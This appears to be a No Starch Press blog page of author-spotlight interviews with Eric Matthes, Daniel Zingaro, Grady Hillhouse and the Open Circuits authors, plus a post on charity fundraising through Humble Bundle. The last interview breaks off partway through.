No Starch Press Blog

Livin' the Dream with Python Crash Course Author Eric Matthes


Cover of Python Crash Course 3EThis Author Spotlight is on Python programmer/educator extraordinaire Eric Matthes, author of the international bestseller (now in its third edition) Python Crash Course. In the following Q&A, we discuss how reader feedback shaped the latest edition of his book, why he chose teaching over a career in physics, the importance of applying new programming concepts to your own projects, and what Eric learned about life—and coding—from riding across the U.S. on a bicycle (five times).

Eric Matthes has been writing computer programs since childhood. For over a decade, he was a high school science and math teacher, as well as a Python programming educator. He now lives in Alaska as a full-time author and informal Python evangelist, making appearances on podcasts and at events like PyCon, where he hopes to meet you in person.

No Starch Press (NSP): Almost eight years ago, you wrote what has become the most popular Python programming book in the world. Even with well over a million readers of your work, you’re known for replying to pretty much every fan who emails you. How has such a high level of audience feedback informed the second and third editions of Python Crash Course? 

Eric Matthes (EM): When people decide to read a book like Python Crash Course, they’re making a pretty significant commitment. I want to know that when people start the book, they can make it through everything that interests them. So, when someone writes to me about something that’s not working for them, I want to help them if at all possible. The teacher in me can’t help but answer people’s questions.

When I respond to questions, I look for patterns in what people are asking about. When the book first came out and I noticed multiple people asking about the same parts of the book, I’d look at those sections to see how I might revise them to avoid common points of confusion. That feedback from readers helped shape the second edition in particular. Writing the second edition gave me the chance to bring all the code in the book up to date, but also allowed me to clarify numerous sections that weren’t written as well as they could have been.

I also post resources online to address the kinds of things people ask about. For example, I posted a full set of solutions early on, because having solutions available is a huge help to independent learners. I’ve posted recommendations about what resources might be most useful to people after finishing Python Crash Course, and some thoughts about how to find your first programming job. The cheat sheets that accompany the book have been downloaded millions of times.

Overall, I spend about 10-20 hours a week answering questions and paying attention to updates in Python, and all the libraries that the projects depend on. For example, over the last two weeks, I wrote a fully updated test suite for all the code in the book, that makes it easier to test any section of the book against new versions of Python and other dependencies. It surprises a lot of people to hear about all this ongoing work. I think most people assume that once a book is published, the work is done. But this is what keeps Python Crash Course relevant and effective through each new printing, and each new edition. It’s mostly joyful work that puts me in touch with people from all over the world on a regular basis.


NSP: Would you share a little about how you got to where you are today? Specifically, how did you go from studying chemical engineering in college (with plans of becoming a particle physicist) to becoming a public-school teacher and, later, a full-time author?

EM: I had a really good high school chemistry class, so I started college with a major in chemical engineering. But after a semester I changed my major to physics—I just loved the quest to understand the universe at the most fundamental levels.

I loved math and science, but I also noticed how many of my peers hated those two subjects. I joined a volunteer tutoring program and noticed that most of the people who came to us for help enjoyed the same subjects I did—it was just the way they’d been taught that wasn’t working for them. That tutoring work really opened my eyes to the impact of good (and bad) teaching.

I wanted to be a particle physicist, but I didn’t want to be a student forever. I tried teaching and found that the challenge of trying to reach every student in a class was as satisfying as hard science. I never really looked back from teaching. I taught middle school math and science for seven years in New York City and then transitioned to high school when I moved to Alaska.

My father was a software engineer in the ’70s and ’80s, so I learned the basics of programming as a kid. (That was a time when people were just starting to have computers in their homes.) I was a hobbyist programmer all my life, and I’d teach intro programming classes whenever I could. In the early 2010s, I was looking for a book I could give to my more motivated students so they could work at their own pace. I was frustrated to find, however, that every book available back then was either aimed at little kids or made too many assumptions about what people already knew.

I decided to write a book that reflected the way I teach: a focus on just enough fundamentals to start doing meaningful projects. I wrote Python Crash Course for “anyone old enough to not want a kids’ book.” It has met that goal beyond my wildest hopes. When the book first came out, I got a handwritten letter from a 10-year-old who said thank you for writing a book they could learn so easily from. I regularly get emails from people in their 70s and 80s who are finally learning programming to satisfy their curiosity or to keep their minds active. And I hear from everyone in between: high school students, undergrad and graduate students, and a whole bunch of people who are already working but are looking to make a career change. These emails, and conversations at conferences, are the highlight of my writing career.


NSP: Speaking of teaching, your early career in the field is what led to a chance encounter with No Starch Press's founder, Bill Pollock, following a lightning talk you gave at PyCon in 2013 about improving education by taking ideas from the programming world. (Tough crowd!) How did your appearance at the conference result in a publishing deal, and had you been thinking about writing a book at that point in your life?

EM: I first went to PyCon in 2012 because I wanted to do something meaningful with the programming skills I’d been informally building all my life. I was starting to build some tools that would help students navigate school better, and help teachers focus on teaching well. For example, I wrote a program that ingested students’ text-based transcripts, which were really hard to read, and generated a visual transcript for each student. You could look at one of these transcripts and in 30 seconds see what a student’s strengths and weaknesses were, and what they needed to focus on in order to graduate. That project didn’t just save time—it changed the nature of many conferences with students and their families. Instead of focusing on the frustrating process of trying to decipher a transcript, the focus was on celebrating successes and how to meet ongoing needs.

I gave a lightning talk in 2013 about how we could bring the well-established concept of openness in programming into the education world, in a way that goes beyond free software. Bill was in the audience, and he’d been having his own frustrations with the school system at that time. He said something along the lines of, “I like what you have to say about education. If you ever want to write a book, feel free to submit a proposal.” Some early No Starch books had been really influential in my life, so that invitation was compelling. I got my start on Linux by reading Ubuntu for Non-Geeks.

I didn’t really want to write a book, because I was focused on those educational infrastructure projects. But when I got back from the conference, I saw a handwritten poster I had put up in my classroom. It was titled “What’s the least you need to know about programming in order to work on your own projects?” I had listed out the most fundamental concepts of programming, along with three suggestions for projects: a video game, a data visualization project, and a web app. I realized that the poster was the table of contents of the book I wished I could teach from, and I basically turned that poster into a book proposal.

I naively thought I could write the book during the summer and edit it during the following school year. That turned into two and a half years of early mornings and late nights! But it was very much worthwhile; Python Crash Course has reached a global audience that I could hardly dream of back then. I kept teaching full-time until 2019. But I couldn’t continue to teach well and write well, so I left the classroom to focus full-time on writing and programming.


NSP: While we’re on the subject of conferences, you encourage your fans to go to events like PyCon or local coding meetups—that is, places where they can benefit from taking part in some sort of Pythonista community. Why do you believe it’s important for programmers (of every skill level) to step away from their monitor and go meet people?

EM: As a programmer, especially if you’re new to the field, it’s so easy to get stuck in your own head. It’s tempting to keep telling yourself you’re not good enough yet, that when you just learn a little more you’ll be ready to meet others and talk about programming. But when you step into a Python space—a meetup, a conference, an organized online event—you’ll almost always meet people you have something in common with.

You’ll definitely meet people who know more about Python than you do. But you’ll also probably meet people who are even newer to the field than you are. You’ll find people who are working on problems you’re interested in, and you’ll be inspired in ways you just can’t predict.

Some of what you hear will go over your head, but that’s quite fine. The concepts you hear about but don’t understand yet will be more familiar when you come across them later in your own work. And they won’t be dry concepts then—you’ll have a face you can connect to that topic. 

There’s also a fair chance you’ll make some lifelong friends, especially if you end up staying in the Python community for a while.


NSP: Given that PCC has been a bestseller for the better part of a decade, you probably come across people who read the book years ago and are now really advanced and/or professional Python programmers. Got any tips on how to continue making progress for those who only recently finished the book? Put another way: How does someone go from beginner to expert programmer, and is that even necessary in order to have success in the field of programming?

EM: That happened much faster than I thought it would! I remember talking to someone at a booth at the second conference after the book came out. They were explaining something technical about what their company does, and halfway through they realized who I was. They stopped what they were saying to share how much Python Crash Course had helped them get started in programming. Then they continued their explanation of an area of programming I hadn’t used much and didn’t fully understand. As an author, that was a very satisfying experience!

In the early days of Python, it was pretty reasonable to aim for mastery of the entire language. It wasn’t that big, and back then the community was a lot smaller as well. These days, Python is huge; it would be really hard to know every part of the language in depth. There are plenty of Python maintainers who know one part of the language well, but who wouldn’t consider themselves an expert in other areas. It’s just too big and touches too many specialized areas.

We all know what a beginner is because it’s relatively easy to define. But there’s no clear definition of “intermediate” or “advanced.” I would advise people to learn one language well enough that you can use it to solve meaningful, real-world problems without having to follow a step-by-step tutorial. That doesn’t mean you need to be able to write code from memory. It’s perfectly fine to look back at the tutorials and resources you’ve learned from as you’re working on your own projects.

The best advice I can give once you’ve learned the basics is to keep learning fundamental concepts, but make sure you’re applying those concepts in a variety of real-world projects. There are a lot of concepts in programming that you can’t fully make sense of until you’ve had the chance to apply them in a variety of contexts


NSP: Let’s talk about your passion for projects, then. Python Crash Course is peppered with a number of them—including a Space Invaders-–style video game—and these endeavors definitely contribute to the book’s effectiveness. Would you explain your philosophy that programmers should always have a project in mind? Bonus question: Care to share any cool projects that you are working on right now?

EM: Nobody really learns programming just to write lines of code. The code we write is only meaningful if it actually does something we (or someone else) cares about. If you have a project you’re yearning to build, you’re almost certainly going to be a more active, engaged learner. Every time a new concept comes up, you’ll ask yourself how that concept might help you implement your project. This pushes you to think more deeply about each new concept and try using it in different ways, until you start to internalize that concept.

At the same time, you probably shouldn’t just focus on one large project. It’s helpful to take on some smaller projects that you can complete, and practice the art of “finishing” a project. No codebase is perfect, so learning to recognize when a project is “good enough” is a tremendously valuable skill.

I always have a number of projects going on. I write a weekly newsletter called Mostly Python, and it consists of individual, one-off posts and series about specific topics. I’m working on a program that will convert these series into mini-ebooks. I’m working on django-simple-deploy, a project that automates configuration and deployment for Django projects. I’m slowly learning piano, and I had a hard time learning all the notes of the grand staff well enough to focus on actually playing music. I made an old-school JavaScript site that facilitates learning the notes, and after using it for two weeks, I’m now the fastest student at naming all the notes. (That really means I’m faster than a bunch of fifth graders, but it still feels good.) I’m going to polish that a bit more and then share it more widely.


NSP: Last question. A surprising detail about your life is that you’ve bicycled across the US [checks notes] five times—in fact, you quit your job at one point and lived on a bike for an entire year! Are there any lessons you learned during those hundreds (thousands?) of hours of pedaling that can be applied to the world of Python programming?

EM: Yes, it was thousands of hours of pedaling!

When I was in my 20s and had a few years of teaching behind me, everyone was focused on getting master’s degrees. I just wanted to live outside during the summer, so I biked across the US for two summers in a row. I rode across the northern states one summer and then took a southern route the next summer. Those were such good experiences, I quit my job so I could live outside for a full year. I rode from Seattle to Maine, down to Florida, over to California, and up to Alaska. I had a conviction that I’d learn more from that kind of journey than I would from getting a master’s degree, and looking back, it was definitely the right choice for me.

One thing I took away from that trip was a deep reserve of calm from having faced everything that a year of living outside brings: beautiful sunny days in wild places, sleety mountain passes, sleeping in a tent for weeks at a time with bears, and so much more. Another big life lesson was a better understanding of all the different ways people live their lives. When you travel alone for an extended period without an engine, people open up in a different way. This was before social media, smartphones, Google Maps, and photo-sharing sites. I stopped a lot to ask directions, and just talk to people on the side of the road. Mostly, I just listened—people want to tell you about the place they live, and many people want to share their life story when you’re outside and don’t have a schedule. People would say, “I wish I could just take off and live on a bike...” and then they’d open up and tell really honest stories about their lives. I think that happened a lot because people knew I was just passing through, and they’d never see me again.

I learned empathy from listening to so many different people. When I write code, I think about the people who will use what I’m making, and I consider who might be negatively impacted by whatever I contribute to. I enjoy time in front of a computer more because of the time I’ve spent far away from a computer. When I deal with stressful bugs and crashes, I remind myself, At least I’m not facing a bear alone on the side of a gravel road in the far north of British Columbia right now.

I believe most programmers benefit from having nontechnical hobbies. Anything you find meaning in away from a computer helps keep your technical work in perspective. Keeping things in perspective is really helpful in a yearslong technical career.

Finishing that trip made it easier to write a book because I had a sense of how to bring a long-term project to completion. In some sense, a 14,000-mile bike trip is nothing more than a whole bunch of individual pedal strokes. When I feel like I’ll never get to the end of a long project, I often think back to hard days of riding and remind myself that every step forward is meaningful. That’s more than just a passing thought, though. It brings back the feeling of living outside on a daily basis. I miss those days, but I’ll carry them with me for the rest of my life.

For anyone interested in hearing more about those adventures, I wrote a book about the trip a while back. It’s kind of funny to be the author of one book that’s sold over a million copies, and another that’s sold about a hundred copies. But I wrote that book more to solidify the memories than to reach a wide audience. 

Solving Problems with Algorithms-Ace Dan Zingaro


Cover of Algorithmic Thinking, 2nd EditionOur latest Author Spotlight is on computer-science whiz Daniel Zingaro, author of Algorithmic Thinking as well as its soon-to-be published second edition, and Learn to Code by Solving Problems (2021). In the following Q&A, we talk with Dan about his favorite childhood computing memory, how he went from nearly dropping out of CS classes at university to teaching them, the accessibility tools that helped him become a programmer despite being severely visually impaired, and why fellow educators should feel empowered to write books about the subjects they teach.

Daniel Zingaro, PhD, is an award-winning associate professor of Mathematical and Computational Sciences at the University of Toronto Mississauga, where he is well-known for his uniquely interactive approach to teaching, and internationally recognized for his expertise in Active Learning. In addition to writing, educating, and researching, Zingaro is one of our go-to technical editors, whose work includes Python for Kids, 2nd Edition (2022), Data Structures the Fun Way (2022), Python for Data Science (2022), and Python One-Liners (2020).

No Starch Press: Congratulations on the second edition of Algorithmic Thinking! One of the things that really makes it unique is your show-not-tell approach to teaching algorithms, where you present the problem first and then guide the reader toward finding the fastest, cleverest solution. It can’t be a coincidence that you’re also an award-winning college professor known for your “active learning” method. Did your experience as an educator influence the way you wrote the book?

Daniel Zingaro: Oh, definitely. I've learned so much about teaching from my students, and I always try to incorporate as much of that as I can into my writing. The reason I flipped the book to be "problem first, material second," rather than the opposite, is because many people are not motivated to learn abstract stuff without understanding why it might be useful or matter to them. If I can have a reader read a description of a problem and be like, "Yo! I don't know how to solve this thing," then I feel like the real learning can begin.
I've also tried to make the book inviting to students who might otherwise not feel welcome. For example, I didn't put proofs or theorems or much math in there, because I know what that stuff does to many students: "Theorem 1: let x, y, and z be ... oh hey look, a new YouTube video!" So why force students to learn in a specific way? Because we happened to learn that way? Because that's the only way to teach it? Those reasons aren't acceptable to me. Students provide constraints on how they want to learn. If we professors are all we think we're cracked up to be, let's rise to this challenge and teach under those constraints. There's no right way to teach. If someone (like, literally, I mean one person) learns from it, then it is right.

NSP: It’s hard to believe that you twice came close to dropping out of Computer Science while attending university — and nearly failed a course that you later went on to teach. But it must be true because you disclose this personal trivia to your students. Why is it important for you to be so open about your past struggles?
DZ: It's true! I really need to dig out my old transcript and post it online for students so they can see my nearly failed grade. It's very important to me to share these low points with students because many students experience low points of their own. The way I connect with the world is through humor and making personal connections. If there's anything I can share with people that helps me make these connections, then I will do it. 
My waffling on whether to drop out of Computer Science, and suffering some poor grades, offer ways for me to make these connections. How funny, right? A professor that almost failed a course? It's really too bad that it's funny – I mean, the only reason it's funny is because it's so rare. With the poor grades and other challenges, I'm fortunate to have still gotten here. But I did, somehow. I figure that maybe my struggles can somehow help someone else with their own struggles.

NSP: Let’s talk about accessible computing for a moment. A lot of our readers may be surprised to learn that you’ve been blind your entire life, which would put you in the very small category of visually impaired students who successfully learn programming and earn advanced degrees in the subject. What adaptive tools helped you overcome the challenges you faced? And, how has the level of accessibility in computing evolved?
DZ: Yep – that's why my books don't have any extraneous pictures. Or cute sidebars. Or cute icons.
The computing tools for accessibility these days are making huge advances. I use the free NVDA screen-reader to do all of my computing tasks. But looking back, the tools only helped me because my parents gave me the opportunity for the tools to help me. My parents are in the Acknowledgements section of my book because, without them, there is no book, there is no career, there is no who-knows-what-else. If you have a disability or are otherwise being excluded, then (if it's safe to do so): advocate for yourself. That's what I learned from them. Could I have advocated for myself otherwise? Could I have advocated if I didn't feel safe in Canada doing so? Probably not. That's scary. I may have worked hard, but the world gave me the opportunity for my work to mean something. How many people work even harder and never have the opportunity to benefit? That's a tragedy.
I try to use one of my lectures every year to show my students the tools that I use to teach. They're computer scientists and are going to be building tools that all of us will use in the future, so I like to show them how much accessibility matters, for real, to a real person. And I always start with a 10-minute discussion of how I hope they interpret what I'm about to show them. It seems natural for them to hear my super-fast screen-reader speech, or the handheld device I use to read Braille, and be like, "holy cow, Dan is epic!" But I'm not. The tools are epic. Actually, wait; that's not quite it. We're all epic. Many people can read or write or do amazing things. And, yeah, the way that most (non-visually impaired) people do it is different than how I do it – but at the end of the day, the technology exists and makes it so that I can do it, too.
Also, a big shout-out to everyone who cares about accessibility and/or works to make software or processes or the world in general more accessible. We need people (including ourselves) to encourage us, and we need the accessibility tools to realize that encouragement.

NSP: Another thing our readers might not know about you is that you're the technical editor behind some of our bestselling books, including Data Structures the Fun Way and the new edition of Python for Kids. Since you've already made a name for yourself as a writer, what drew you to the unsung-hero role of technical editing, and can you tell us a little about what you actually do in that regard?
DZ: I find technical editing to be quite fun. I find learning fun, and editing books helps me sharpen what I know about a particular topic, so it's kind of fun by default. I also welcome the opportunity to help authors produce even better books. It's the best when there's an author doing great work, and I can in some small way help that author even further. Sometimes I'll be editing a book and think, "dang, this is so good! Why couldn't I have written this?" But, the reason is that I couldn't write their book even if I tried. The author has a particular voice, a particular expertise. Editing permits me to revel in that expertise, to just be grateful for the fact that here we have another author who has the ability and opportunity and life circumstances to share what they know.
What I do when editing is annoy the author with every tiny improvement/possible improvement that I can think of. (No, really – ask them.) I check all of the code and text, of course, but that's not my favorite part. My favorite part is using what I know about teaching to offer suggestions where I suspect learners may get particularly stuck. A lot of the topics covered in these books are ones I haven't taught before, and even if I have, I know only a small amount about where and why learners do or do not make progress. The challenge really never goes away, that's for sure, but I welcome any opportunity to try my best to be helpful given what I do know.
NSP: Like many of our authors, you’ve been into programming since you were young. What’s your earliest memory of enjoying computing, and when did it go from being a hobby to a career path?
DZ: One of my earliest computing memories also happens to be one of my favorites. My family was trying to get me a computer loaned to us with screen-reading technology on it (as it was expensive in those days and involved several interacting software and hardware devices). We were at an assessment center to look at some models, and my dad and some employees were talking about computery stuff that I didn't understand. Honestly, all I wanted to do was play a computer game or type something funny on the screen, but the adults just kept talking. Finally they stopped and wanted me to try out three different types of computers to see which one I could best work with. I started with the first computer, typing a little story. And then I managed to do what turned out to be the best thing ever: I froze the machine. But not just a normal freeze, a hilarious freeze where the screen-reader thing kept repeating the same “ah ah ah” syllable again and again, with no way to stop it. All of the fancy computery people were trying fancy things but simply could not make it stop. I was doing my absolute best not to laugh, because I desperately wanted the chance to take home a computer that day. Eventually they gave up and had to completely shut it down by flicking the power switch. Once they did that, I just couldn't hold it in anymore and burst out laughing (while also realizing I probably blew my chance at getting them to give me a PC). But, no! It turns out that they were actually impressed that I had successfully frozen the computer, and agreed to loan it to us on the spot. Looking back, I didn't do anything impressive – probably just pressed a bunch of keys at the same time or some such nonsense.
Presently, I'd say I'm more of a teacher-person than a computer-person. Computing happens to be the thing that I can apparently teach best, but I get my true motivation from teaching in and of itself. I often catch myself learning something new and then immediately thinking about how I might teach it. Or I'll solve a computing problem and then be thinking about which chapter of a book it might serve as an example in.
NSP: You’ve been a professor at UT-Mississauga for nearly a decade now. What’s the most significant thing you’ve discovered about teaching Computer Science in all that time?
DZ: The most significant thing I've learned is that every book is total junk for a subset of students. For any one of the textbooks I use – say, a classic CS book – there is a subset of students for whom that book just doesn't work. In fact, my happiest teaching days usually involve a student telling me that my book isn't working for them. Now, it might not be their happiest day, because then I try to drag them into a two-hour conversation about why it isn’t working. But I really do want to learn from them and try to do better. And they know how passionate I am about learning, so I don't feel too bad about that!

NSP: Much like sky-diving, writing a book takes a leap of faith — and you’ve done both. What advice can you offer to fellow CS educators who have thought about becoming an author but are scared to make the jump?
DZ: I'm married now, and I'm pretty sure I signed some wedding papers that make me not allowed to skydive anymore. (I'm guessing that book-writing is still okay, though.)
I think CS educators are in a unique position to write books that teach. They have so much experience in the classroom, and I myself was surprised how much of it I was able to carry over into my writing. I'm not an algorithms researcher. I don't know a whole lot more about algorithms than what I put into the book. (You'll know that I learned new algorithm stuff if you ever see a third edition of Algorithmic Thinking!) But, you know what? I think not being an algorithms researcher was a blessing for this book. I'm not so far removed from remembering how challenging it was for me to learn these concepts the first time. And the approaches I know best are the general (not specialized) ones that are applicable to a wide variety of problems that programmers might run into in the wild. I hope readers can see in every chapter how excited I am to learn even more about algorithms, and I hope that excitement helps fuel their own excitement.
So, say you teach a web programming course. Or an architecture course. You've tuned it. Your students respond well. Who cares if you're not the foremost expert on web programming or architecture? You're a teacher who knows how to connect with students and, as such, your book is valuable.

Ride-Along with Engineer Grady Hillhouse, the Ultimate Road Trip Buddy


Cover of Engineering in Plain SightNew year, new spotlight—and this one shines on civil engineer and YouTube star Grady Hillhouse. His first book, Engineering in Plain Sight, was released this past Fall to critical acclaim. In the following Q&A, we talk with Grady about how he went from civil engineer to full-time video producer with over 3 million subscribers (hint: woodworking), why all he needed to know about science communication he learned in kindergarten, the importance of average citizens understanding how things work, and the joy of "infrastructure spotting" on the road.


Grady Hillhouse is a civil engineer and science communicator widely known for his educational video series "Practical Engineering," currently one of the largest engineering channels on YouTube, with millions of views each month. His videos, which focus on infrastructure and the human-made environment, have garnered media attention from around the world and been featured on the Science Channel, Discovery Channel, and in many publications. Before producing videos full- time, Grady worked as an engineering consultant, focusing primarily on dams and hydraulic structures. He holds degrees from Texas State University and Texas A&M University.

No Starch Press: You got your bachelor’s degree in geography, then later earned a master’s degree in civil engineering, and spent nearly a decade working in the field on infrastructure projects. How did you go from that path to becoming a full-time YouTube sensation?

Grady Hillhouse: Making YouTube videos started as a hobby for me when I was given some woodworking tools. I wanted to learn to use them, and of course, I went to YouTube to watch tutorials. What I found was a community of woodworkers producing videos of their projects and sharing with each other. I was so fascinated that YouTube could be used in a social way (I had only thought of it as a search engine for videos), and I wanted to be a part of the community. Over time, I started including some engineering into my woodworking videos. Eventually I realized that I really enjoy sharing my passion and experience in engineering to others, and I decided to focus on that topic. 
I continued making videos about engineering and infrastructure in my free time, and worked to make them better and better. When my first son was born, all that free time I had to make videos vanished. I was forced to make a choice between sticking with my career in engineering or finding a way to support my family with my hobby. Ultimately, I decided I could have a bigger impact on the world producing videos (and writing a book). If everything comes crashing down, I still have my engineering license to fall back on!

NSP: You clearly have a genuine passion for the built environment—it shines through in every one of your YouTube videos and all throughout the new book. So, chicken or the egg: Did this interest spring from your graduate studies and (initial) profession, or did your fervor for infrastructure influence your academic and career pursuits?
GH: I have been interested in how things work since I was a kid, but my passion for infrastructure really didn’t come until college. My undergraduate classes in water resources are really what led me into civil engineering. My engineering classes are where my eyes were opened to all the “hidden in plain sight” details of the built environment. Every class was like turning on a lamp to illuminate some innocuous part of the constructed environment that I had never noticed before, and I just never stopped paying attention since.

NSP: Like Bill Nye and Neil deGrasse Tyson, you’re known as a “science communicator.” But one thing engineers are not typically known for is the ability to explain complex technical processes in laypeople's terms. What’s your trick for translating “engineer speak” into engaging, accessible content without dumbing it down?
GH: My wife was a kindergarten teacher when I first started working as an engineer, and I once got invited to her elementary school to give a presentation about civil engineering. I built a model that shows the different purposes of a dam and reservoir. The first presentation I gave went really well. It seemed like the kids were interested in what I had to say, but I noticed that I was getting questions from teachers. So the next few classes, I started paying attention to the teachers and administrators in the back as I went through my presentation, and was surprised at how attentive they were. 
It slowly kind of dawned on me over the course of these five or six presentations I gave that, when I talked about my career to adults, I was usually trying to make myself sound smart and dignified, avoid dumbing it down, or accidentally patronizing someone. But, when I was talking to students, I didn’t have those pretenses. 
I’ve basically spent the past 10 years reminding myself that the average adult knows just as much about civil engineering as your average kindergartner. Half of civil engineers just think about dirt and rock all day. We have no good reason to pretend to be so dignified. It’s not just how you keep the interest of a bunch of kindergartners for 15 minutes; it’s how you reach an audience on their level.

NSP: Your book is an “illustrated field guide to the constructed environment” and, indeed, the simple yet incredibly detailed illustrations of every structure being explained on the page really highlight why they should be seen as “monuments to the solutions to hundreds of practical engineering problems,” as you put it. How did these awesome little artistic renderings come about?
GH: The idea for the book was very much rooted in the idea that there are all kinds of structures and devices that we see out in the world but can’t identify, and really, can’t even do an internet search for because they are quite difficult to describe. So, each section focuses on the parts of infrastructure that you can see. Just like using a field guide to birds or plants or rocks, as you slowly start to learn the names and purposes of what you can observe, it makes being outside a lot more fun. It gives you something to pay attention to on walks or road trips.
When I was a kid, one of my favorite things to do while bored was to open an encyclopedia up to a random page and read about what I found. I really wanted readers to use Engineering In Plain Sight the same way where you can just open to any page and find something interesting. I worked really hard with my graphics team at MUTI to make each one of the illustrations as rich and full of detail as possible, and I’m so proud of what we came up with together.

NSP: Similar to your YouTube channel, “Practical Engineering,” has gotten an amazing response from a wide-ranging audience. And I think it’s fair to say that the majority of people who pre-ordered the book or put it on their holiday wish-list were not, in fact, engineers (though it's been popular in engineering circles, too). Why do you think the rest of us are so captivated by getting an inside look at how cell towers, highways, levees—the built world—actually works?
GH: It’s hard to say for sure! But, I suspect part of it is that these structures really are in plain sight. Learning something new about some seemingly mundane part of your immediate surroundings is magical. My favorite comment to get on a video is, “I didn’t even realize I was curious about this until you asked the question.”

NSP: A few months ago, you did a “Practical Engineering” video on a massive—and massively troubled—South Texas bridge project. For those who live in the area, like yourself, it’s a local issue. But your “Harbor Bridge” episode now has over 1.6 million views and nearly 3,000 comments. Do you think that helping people understand the infrastructure in their community (and how it can fail) is a way to strengthen civic engagement through a more informed citizenry?
GH: I really do believe we need to understand our connection to the constructed environment to care for it and to invest in it, which means we need to know at least a little bit about how it works. Our lives rely on many types of infrastructure: roads, bridges, dams, sewers, pipelines, retaining walls, water towers—these structures form the basic pillars of modern society. 
And the decisions we make about infrastructure —where to build it, how to pay for it, and when we maintain it—have consequences that affect everyone in powerful and fundamental ways. So, we need everyone to be involved in those decisions, not just engineers and bureaucrats. We all carry some responsibility for how the world is built around us. Investment in infrastructure requires that we value and appreciate it first, and so that’s what I try to do with my videos and the book.

NSP: In addition to opening everyone’s eyes to the feats of infrastructure that surround and support our modern lives, you’ve also introduced us to the oddly joyful pastime of “infrastructure spotting”—something you apparently still get a kick out of. In fact, you note that your “entire life is essentially a treasure hunt for all the interesting little details of the constructed world.” (I bet you’re fun on road trips!) What fuels your ongoing enthusiasm and sense of wonder for the built environment, given you literally wrote the book on the subject?

GH: In any city I visit, I want to learn where they get their water, how their electrical grid is set up, how they manage drainage and flooding and transit and wastewater, et cetera. There is so much variety in how we solve difficult challenges through infrastructure. Plus, we’re always building new things and using new technologies. So, there’s almost always something new to see wherever you go!  


With Your Help, We Raised Over $2.75M for Charity!


We’ve been partnering with our authors and Humble Bundle on special pay-what-you-want ebook deals since 2015—that’s 30 bundles to date, for those keeping score at home. As anyone who’s taken advantage of these promotions knows, the PWYW model means that you choose between various pricing tiers of titles, then decide how much of your purchase goes to charity.

This is all to say: THANK YOU. We’re fortunate to have such a generous customer base, because over the last eight years we’ve raised more than $2.75 million for two-dozen non-profits, as well as the Hacker Alliance—a 501(c)(3) created by publisher Bill Pollock to support hacker communities around the world.

From promoting digital rights and fighting censorship, to helping marginalized populations learn to code, to supporting education through the United Negro College Fund and Teach for America, we’ve done a lot of good together.

Here’s the full list of nonprofits that your charitable donations have gone towards:

  • Electronic Frontier Foundation
  • The No Starch Press Foundation 
  • Python Software Foundation 
  • Choose-Your-Own-Charity 
  • National Coalition Against Censorship 
  • Freedom of the Press Foundation 
  • Internet Security Research Group
  • Freedom to Read Foundation 
  • Book Industry Charitable Foundation
  • Girls Who Code 
  • Comic Book Legal Defense Fund
  • Covenanthouse 
  • United Negro College Fund
  • Teach For America
  • Code-to-Learn Foundation 
  • Women Who Code, Inc. 
  • Extra Life 
  • Active Minds, Inc. 
  • Every Child a Reader
  • St. Jude Children's Research Hospital 
  • Call of Duty Endowment 
  • The Red Nose Day Fund / Comic Relief, Inc.
  • It Gets Better Project 



About Humble Bundle 

Humble Bundle sells digital content through its pay-what-you-want bundle promotions and the Humble Store. When purchasing a bundle, customers choose how much they want to pay and decide where their money goes—between the content creators, charity, and Humble Bundle. Since the company's launch in 2010, Humble Bundle has raised more than $140 million through the support of its community for a wide range of charities, providing aid for people across the world. For more information, visit


Cutting It Up with Open Circuits' Windell Oskay & Eric Schlaepfer


Aglow in our Author Spotlight series this month are the daring duo behind Open Circuits: The Inner Beauty of Electronic Components—Windell Oskay and Eric Schlaepfer. Their book is a truly unique photographic exploration of the astonishing design hiding in everyday electronics, and it's as awesome as it sounds. In the following Q&A, we talk with Eric and Windell about how this project came about, the ins and outs of the hardware disassembly and macro-photography feats it took to make the book, the surprises—both good and bad—that they encountered along the way, and the many challenges of cutting a cathode ray tube in two.

Eric SchlaepferOpen CircuitsWindell Oskay

Eric is a hardware engineer at Google, and runs the popular Twitter account @TubeTimeUS, where he posts cross-section photos, discusses retrocomputing and reverse engineering, and investigates engineering accidents. His better-known projects are the MOnSter 6502 (the world’s largest 6502 microprocessor, made out of individual transistors) and the Snark Barker (a retro recreation of the famous Sound Blaster sound card).

Windell is the co-founder of Evil Mad Scientist Laboratories, where he designs robots and produces DIY and OS hardware "for art, education, and world domination.” A longtime photographer, he holds a B.A. in Physics and Mathematics from Lake Forest College and a Ph.D. in Physics from the University of Texas at Austin. Besides Open Circuits, he's author of The Annotated Build-It-Yourself Science Laboratory (Maker Media, 2015).

No Starch Press: First of all, congratulations on all the hard work paying off. The response to your book has been incredible. Considering how popular cross-section pictures were when I was a kid, I guess it’s not too surprising. People still love peeking into things full of hidden complexities! But the books I remember were mostly just intricate drawings—for Open Circuits, you actually photographed real stuff that you cut in half. What inspired this project? Did you intend to add a whole new dimension to the “cutaway” genre?

Eric Schlaepfer: I grew up fascinated by cross sections and cutaways. I’m sure that influenced this book, but it’s not exactly what inspired me. It was a broken piece of equipment, and the problem was one of the electrical components (a tantalum capacitor similar to the one on page 40). I sanded it in half to see if I could figure out how it failed, tweeted a photo, and folks really enjoyed it. So I started cutting other parts in half, and that led to the book.

Windell Oskay: I’ve always been interested in how things are made, in addition to how they work and what’s inside them. One of the really remarkable things about physically cutting things is that you get to see so many features that are maybe incidental to the function of the device, but are signatures of the processes that went into making it. Each part tells a story. And, often, we’re not even saying anything about them. Those little stories are left for the readers to discover.


NSP: The two of you have professionally intersected over the years in Silicon Valley, and have worked together on some design projects for Evil Mad Scientist Laboratories. But who roped whom into this book idea? What compelled you to collaborate at such a level?

ES: We’ve worked together on a number of other projects, such as the Three Fives discrete 555 timer kit, as well as the world’s largest 6502 microprocessor—the MOnSter 6502. Windell had seen my photos on Twitter, and we started talking about how to turn it into a book. I don’t remember all the details but it was a very natural thing.

WO: We’ve had a number of fruitful collaborations. In addition to those that Eric mentioned, we also designed an educational project, “Uncovering the Silicon,” that we presented at Maker Faire (along with Ken Shirriff, our technical reviewer for Open Circuits, and John McMaster, who prepared some subjects for photography). In that project, we placed very simple integrated circuits under a microscope and showed how they worked by tracing their individual parts. There’s a sense in which our book is a successor to that project—we’re letting people look at things up close, and then talking through how they work. But, I think that there was actually a moment when I roped Eric into the book idea after seeing his early cross-section photos.


NSP: What was the most challenging aspect of putting this book together?

ES: There were many challenges. For me, the most difficult challenge was preparing the samples—it took a really long time to prepare each one, taking care to create a polished section with no scratches or blemishes, and being careful to remove every speck of dust.

